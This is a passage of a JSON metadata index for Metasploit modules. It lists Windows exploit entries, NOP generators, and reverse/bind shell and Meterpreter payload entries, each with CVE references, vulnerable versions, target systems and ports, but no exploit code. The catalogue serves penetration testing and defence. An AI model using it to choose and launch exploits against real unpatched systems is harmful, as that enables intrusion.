"full_name": "exploit/windows/tftp/opentftp_error_code",
"rank": 200,
"disclosure_date": "2008-07-05",
"type": "exploit",
"author": [
"tixxDZ",
"steponequit"
],
"description": "This module exploits a buffer overflow in OpenTFTP Server SP 1.4. The vulnerable\n condition triggers when the TFTP opcode is configured as an error packet, the TFTP\n service will then format the message using a sprintf() function, which causes an\n overflow, therefore allowing remote code execution under the context of SYSTEM.\n\n The offset (to EIP) is specific to how the TFTP was started (as a 'Stand Alone',\n or 'Service'). By default the target is set to 'Service' because that's the default\n configuration during OpenTFTP Server SP 1.4's installation.",
"references": [
"CVE-2008-2161",
"OSVDB-44904",
"BID-29111",
"URL-http://downloads.securityfocus.com/vulnerabilities/exploits/29111.pl"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"OpenTFTP 1.4 Service",
"OpenTFTP 1.4 Stand Alone"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/tftp/opentftp_error_code.rb",
"is_install_path": true,
"ref_name": "windows/tftp/opentftp_error_code",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/quick_tftp_pro_mode": {
"name": "Quick FTP Pro 2.1 Transfer-Mode Overflow",
"full_name": "exploit/windows/tftp/quick_tftp_pro_mode",
"rank": 400,
"disclosure_date": "2008-03-27",
"type": "exploit",
"author": [
"Saint Patrick"
],
"description": "This module exploits a stack buffer overflow in the Quick TFTP Pro server\n product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting\n in a DoS. This is a port of a sploit by Mati \"muts\" Aharoni.",
"references": [
"CVE-2008-1610",
"OSVDB-43784",
"BID-28459",
"URL-http://secunia.com/advisories/29494"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Server 2000",
"Windows XP SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb",
"is_install_path": true,
"ref_name": "windows/tftp/quick_tftp_pro_mode",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/tftpd32_long_filename": {
"name": "TFTPD32 Long Filename Buffer Overflow",
"full_name": "exploit/windows/tftp/tftpd32_long_filename",
"rank": 200,
"disclosure_date": "2002-11-19",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in TFTPD32 version 2.21\n and prior. By sending a request for an overly long file name\n to the tftpd32 server, a remote attacker could overflow a buffer and\n execute arbitrary code on the system.",
"references": [
"CVE-2002-2226",
"OSVDB-45903",
"BID-6199"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows NT 4.0 SP6a English",
"Windows 2000 Pro SP4 English",
"Windows XP Pro SP0 English",
"Windows XP Pro SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/tftp/tftpd32_long_filename.rb",
"is_install_path": true,
"ref_name": "windows/tftp/tftpd32_long_filename",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/tftpdwin_long_filename": {
"name": "TFTPDWIN v0.4.2 Long Filename Buffer Overflow",
"full_name": "exploit/windows/tftp/tftpdwin_long_filename",
"rank": 500,
"disclosure_date": "2006-09-21",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending\n an overly long file name to the tftpd.exe server, the stack can be overwritten.",
"references": [
"CVE-2006-4948",
"OSVDB-29032",
"BID-20131",
"EDB-3132"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal - tftpd.exe"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/tftp/tftpdwin_long_filename.rb",
"is_install_path": true,
"ref_name": "windows/tftp/tftpdwin_long_filename",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/tftpserver_wrq_bof": {
"name": "TFTP Server for Windows 1.4 ST WRQ Buffer Overflow",
"full_name": "exploit/windows/tftp/tftpserver_wrq_bof",
"rank": 300,
"disclosure_date": "2008-03-26",
"type": "exploit",
"author": [
"Mati Aharoni",
"Datacut"
],
"description": "This module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw\n is due to the way TFTP handles the filename parameter extracted from a WRQ request.\n The server will append the user-supplied filename to TFTP server binary's path\n without any bounds checking, and then attempt to check this path with a fopen().\n Since this isn't a valid file path, fopen() returns null, which allows the\n corrupted data to be used in a strcmp() function, causing an access violation.\n\n Since the offset is sensitive to how the TFTP server is launched, you must know\n in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone'\n , and then manually select your target accordingly. A successful attempt will lead\n to remote code execution under the context of SYSTEM if run as a service, or\n the user if run as a standalone. A failed attempt will result a denial-of-service.",
"references": [
"CVE-2008-1611",
"OSVDB-43785",
"BID-18345",
"EDB-5314"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2/SP3 EN Service Mode",
"Windows XP SP2/SP3 EN Standalone Mode",
"Windows 7 SP0/SP1 EN x64 Service Mode",
"Windows 7 SP0/SP1 EN x64 Standalone Mode",
"Windows 7 SP0/SP1 EN x86 Service Mode",
"Windows 7 SP0/SP1 EN x86 Standalone Mode"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb",
"is_install_path": true,
"ref_name": "windows/tftp/tftpserver_wrq_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/threectftpsvc_long_mode": {
"name": "3CTftpSvc TFTP Long Mode Buffer Overflow",
"full_name": "exploit/windows/tftp/threectftpsvc_long_mode",
"rank": 500,
"disclosure_date": "2006-11-27",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in 3CTftpSvc 2.0.1. By\n sending a specially crafted packet with an overly long mode\n field, a remote attacker could overflow a buffer and execute\n arbitrary code on the system.",
"references": [
"CVE-2006-6183",
"OSVDB-30758",
"BID-21301",
"URL-http://secunia.com/advisories/23113/"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"3CTftpSvc 2.0.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb",
"is_install_path": true,
"ref_name": "windows/tftp/threectftpsvc_long_mode",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/unicenter/cam_log_security": {
"name": "CA CAM log_security() Stack Buffer Overflow (Win32)",
"full_name": "exploit/windows/unicenter/cam_log_security",
"rank": 500,
"disclosure_date": "2005-08-22",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a vulnerability in the CA CAM service\n by passing a long parameter to the log_security() function.\n The CAM service is part of TNG Unicenter. This module has\n been tested on Unicenter v3.1.",
"references": [
"CVE-2005-2668",
"OSVDB-18916",
"BID-14622"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"W2API.DLL TNG 2.3",
"Windows 2000 SP0-SP4 English",
"Windows XP SP0-SP1 English",
"Windows XP SP2 English",
"Windows 2003 SP0 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/unicenter/cam_log_security.rb",
"is_install_path": true,
"ref_name": "windows/unicenter/cam_log_security",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/vnc/realvnc_client": {
"name": "RealVNC 3.3.7 Client Buffer Overflow",
"full_name": "exploit/windows/vnc/realvnc_client",
"rank": 300,
"disclosure_date": "2001-01-29",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).",
"references": [
"CVE-2001-0167",
"OSVDB-6281",
"BID-2305"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4 English",
"Windows XP SP2 English",
"Windows 2003 SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/vnc/realvnc_client.rb",
"is_install_path": true,
"ref_name": "windows/vnc/realvnc_client",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/vnc/ultravnc_client": {
"name": "UltraVNC 1.0.1 Client Buffer Overflow",
"full_name": "exploit/windows/vnc/ultravnc_client",
"rank": 300,
"disclosure_date": "2006-04-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in UltraVNC Win32\n Viewer 1.0.1 Release.",
"references": [
"CVE-2006-1652",
"OSVDB-24456",
"BID-17378"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4 English",
"Windows XP SP2 English",
"Windows 2003 SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/vnc/ultravnc_client.rb",
"is_install_path": true,
"ref_name": "windows/vnc/ultravnc_client",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/vnc/ultravnc_viewer_bof": {
"name": "UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow",
"full_name": "exploit/windows/vnc/ultravnc_viewer_bof",
"rank": 300,
"disclosure_date": "2008-02-06",
"type": "exploit",
"author": [
"noperand"
],
"description": "This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release.\n\n If a malicious server responds to a client connection indicating a minor\n protocol version of 14 or 16, a 32-bit integer is subsequently read from\n the TCP stream by the client and directly provided as the trusted size for\n further reading from the TCP stream into a 1024-byte character array on\n the stack.",
"references": [
"CVE-2008-0610",
"OSVDB-42840",
"BID-27561"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb",
"is_install_path": true,
"ref_name": "windows/vnc/ultravnc_viewer_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/vnc/winvnc_http_get": {
"name": "WinVNC Web Server GET Overflow",
"full_name": "exploit/windows/vnc/winvnc_http_get",
"rank": 200,
"disclosure_date": "2001-01-29",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a buffer overflow in the AT&T WinVNC version\n <= v3.3.3r7 web server. When debugging mode with logging is\n enabled (non-default), an overly long GET request can overwrite\n the stack. This exploit does not work well with VNC payloads!",
"references": [
"BID-2306",
"OSVDB-6280",
"CVE-2001-0168"
],
"platform": "Windows",
"arch": "",
"rport": 5800,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows NT4 SP3-6",
"Windows 2000 SP1-4",
"Windows XP SP0-1"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/vnc/winvnc_http_get.rb",
"is_install_path": true,
"ref_name": "windows/vnc/winvnc_http_get",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/vpn/safenet_ike_11": {
"name": "SafeNet SoftRemote IKE Service Buffer Overflow",
"full_name": "exploit/windows/vpn/safenet_ike_11",
"rank": 200,
"disclosure_date": "2009-06-01",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Safenet SoftRemote IKE IreIKE.exe\n service. When sending a specially crafted udp packet to port 62514 an\n attacker may be able to execute arbitrary code. This module has\n been tested with Juniper NetScreen-Remote 10.8.0 (Build 20) using\n windows/meterpreter/reverse_ord_tcp payloads.",
"references": [
"CVE-2009-1943",
"OSVDB-54831",
"BID-35154",
"URL-http://reversemode.com/index.php?option=com_content&task=view&id=63&Itemid=1"
],
"platform": "Windows",
"arch": "",
"rport": 62514,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"SafeNet Irelke 10.8.0.20",
"SafeNet Irelke 10.8.0.10",
"SafeNet Irelke 10.8.3.6"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/vpn/safenet_ike_11.rb",
"is_install_path": true,
"ref_name": "windows/vpn/safenet_ike_11",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/winrm/winrm_script_exec": {
"name": "WinRM Script Exec Remote Code Execution",
"full_name": "exploit/windows/winrm/winrm_script_exec",
"rank": 0,
"disclosure_date": "2012-11-01",
"type": "exploit",
"author": [
"thelightcosine"
],
"description": "This module uses valid credentials to login to the WinRM service\n and execute a payload. It has two available methods for payload\n delivery: Powershell 2.0 and VBS CmdStager.\n\n The module will check if Powershell 2.0 is available, and if so uses\n that method. Otherwise it falls back to the VBS CmdStager which is\n less stealthy.\n\n IMPORTANT: If targeting an x64 system with the Powershell method\n you MUST select an x64 payload. An x86 payload will never return.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 5985,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
5985,
5986
],
"autofilter_services": [
"http",
"https",
"winrm"
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/winrm/winrm_script_exec.rb",
"is_install_path": true,
"ref_name": "windows/winrm/winrm_script_exec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/wins/ms04_045_wins": {
"name": "MS04-045 Microsoft WINS Service Memory Overwrite",
"full_name": "exploit/windows/wins/ms04_045_wins",
"rank": 500,
"disclosure_date": "2004-12-14",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits an arbitrary memory write flaw in the\n WINS service. This exploit has been tested against Windows\n 2000 only.",
"references": [
"CVE-2004-1080",
"OSVDB-12378",
"BID-11763",
"MSB-MS04-045"
],
"platform": "Windows",
"arch": "",
"rport": 42,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/wins/ms04_045_wins.rb",
"is_install_path": true,
"ref_name": "windows/wins/ms04_045_wins",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_aarch64/simple": {
"name": "Simple",
"full_name": "nop/aarch64/simple",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
],
"description": "Simple NOP generator",
"references": [
],
"platform": "All",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-14 18:26:11 +0000",
"path": "/modules/nops/aarch64/simple.rb",
"is_install_path": true,
"ref_name": "aarch64/simple",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_armle/simple": {
"name": "Simple",
"full_name": "nop/armle/simple",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
"hdm <x@hdm.io>"
],
"description": "Simple NOP generator",
"references": [
],
"platform": "All",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/nops/armle/simple.rb",
"is_install_path": true,
"ref_name": "armle/simple",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_mipsbe/better": {
"name": "Better",
"full_name": "nop/mipsbe/better",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
"jm"
],
"description": "Better NOP generator",
"references": [
],
"platform": "All",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/nops/mipsbe/better.rb",
"is_install_path": true,
"ref_name": "mipsbe/better",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_php/generic": {
"name": "PHP Nop Generator",
"full_name": "nop/php/generic",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
"hdm <x@hdm.io>"
],
"description": "Generates harmless padding for PHP scripts",
"references": [
],
"platform": "All",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/nops/php/generic.rb",
"is_install_path": true,
"ref_name": "php/generic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_ppc/simple": {
"name": "Simple",
"full_name": "nop/ppc/simple",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
"hdm <x@hdm.io>"
],
"description": "Simple NOP generator",
"references": [
],
"platform": "All",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-20 15:53:49 +0000",
"path": "/modules/nops/ppc/simple.rb",
"is_install_path": true,
"ref_name": "ppc/simple",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_sparc/random": {
"name": "SPARC NOP Generator",
"full_name": "nop/sparc/random",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
"vlad902 <vlad902@gmail.com>"
],
"description": "SPARC NOP generator",
"references": [
],
"platform": "All",
"arch": "sparc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-27 11:24:38 +0000",
"path": "/modules/nops/sparc/random.rb",
"is_install_path": true,
"ref_name": "sparc/random",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_tty/generic": {
"name": "TTY Nop Generator",
"full_name": "nop/tty/generic",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
"hdm <x@hdm.io>"
],
"description": "Generates harmless padding for TTY input",
"references": [
],
"platform": "All",
"arch": "tty",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/nops/tty/generic.rb",
"is_install_path": true,
"ref_name": "tty/generic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_x64/simple": {
"name": "Simple",
"full_name": "nop/x64/simple",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "An x64 single/multi byte NOP instruction generator.",
"references": [
],
"platform": "All",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/nops/x64/simple.rb",
"is_install_path": true,
"ref_name": "x64/simple",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_x86/opty2": {
"name": "Opty2",
"full_name": "nop/x86/opty2",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
"spoonm <spoonm@no$email.com>",
"optyx <optyx@no$email.com>"
],
"description": "Opty2 multi-byte NOP generator",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/nops/x86/opty2.rb",
"is_install_path": true,
"ref_name": "x86/opty2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"nop_x86/single_byte": {
"name": "Single Byte",
"full_name": "nop/x86/single_byte",
"rank": 300,
"disclosure_date": null,
"type": "nop",
"author": [
"spoonm <spoonm@no$email.com>"
],
"description": "Single-byte NOP generator",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/nops/x86/single_byte.rb",
"is_install_path": true,
"ref_name": "x86/single_byte",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_aix/ppc/shell_bind_tcp": {
"name": "AIX Command Shell, Bind TCP Inline",
"full_name": "payload/aix/ppc/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "AIX",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "aix/ppc/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_aix/ppc/shell_find_port": {
"name": "AIX Command Shell, Find Port Inline",
"full_name": "payload/aix/ppc/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "AIX",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/aix/ppc/shell_find_port.rb",
"is_install_path": true,
"ref_name": "aix/ppc/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_aix/ppc/shell_interact": {
"name": "AIX execve Shell for inetd",
"full_name": "payload/aix/ppc/shell_interact",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "Simply execve /bin/sh (for inetd programs)",
"references": [
],
"platform": "AIX",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/aix/ppc/shell_interact.rb",
"is_install_path": true,
"ref_name": "aix/ppc/shell_interact",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_aix/ppc/shell_reverse_tcp": {
"name": "AIX Command Shell, Reverse TCP Inline",
"full_name": "payload/aix/ppc/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "AIX",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "aix/ppc/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_android/meterpreter/reverse_http": {
"name": "Android Meterpreter, Android Reverse HTTP Stager",
"full_name": "payload/android/meterpreter/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>",
"OJ Reeves",
"anwarelmakrahy"
],
"description": "Run a meterpreter server in Android. Tunnel communication over HTTP",
"references": [
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/android/reverse_http.rb",
"is_install_path": true,
"ref_name": "android/meterpreter/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_android/meterpreter/reverse_https": {
"name": "Android Meterpreter, Android Reverse HTTPS Stager",
"full_name": "payload/android/meterpreter/reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>",
"OJ Reeves",
"anwarelmakrahy"
],
"description": "Run a meterpreter server in Android. Tunnel communication over HTTPS",
"references": [
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/android/reverse_https.rb",
"is_install_path": true,
"ref_name": "android/meterpreter/reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_android/meterpreter/reverse_tcp": {
"name": "Android Meterpreter, Android Reverse TCP Stager",
"full_name": "payload/android/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Run a meterpreter server in Android. Connect back stager",
"references": [
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/android/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "android/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_android/meterpreter_reverse_http": {
"name": "Android Meterpreter Shell, Reverse HTTP Inline",
"full_name": "payload/android/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/android/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "android/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_android/meterpreter_reverse_https": {
"name": "Android Meterpreter Shell, Reverse HTTPS Inline",
"full_name": "payload/android/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/android/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "android/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_android/meterpreter_reverse_tcp": {
"name": "Android Meterpreter Shell, Reverse TCP Inline",
"full_name": "payload/android/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
],
"description": "Connect back to the attacker and spawn a Meterpreter shell",
"references": [
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/android/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "android/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_android/shell/reverse_http": {
"name": "Command Shell, Android Reverse HTTP Stager",
"full_name": "payload/android/shell/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>",
"anwarelmakrahy",
"OJ Reeves"
],
"description": "Spawn a piped command shell (sh). Tunnel communication over HTTP",
"references": [
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/android/reverse_http.rb",
"is_install_path": true,
"ref_name": "android/shell/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_android/shell/reverse_https": {
"name": "Command Shell, Android Reverse HTTPS Stager",
"full_name": "payload/android/shell/reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>",
"anwarelmakrahy",
"OJ Reeves"
],
"description": "Spawn a piped command shell (sh). Tunnel communication over HTTPS",
"references": [
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/android/reverse_https.rb",
"is_install_path": true,
"ref_name": "android/shell/reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_android/shell/reverse_tcp": {
"name": "Command Shell, Android Reverse TCP Stager",
"full_name": "payload/android/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>"
],
"description": "Spawn a piped command shell (sh). Connect back stager",
"references": [
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/android/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "android/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_apple_ios/aarch64/meterpreter_reverse_http": {
"name": "Apple_iOS Meterpreter, Reverse HTTP Inline",
"full_name": "payload/apple_ios/aarch64/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Apple_iOS",
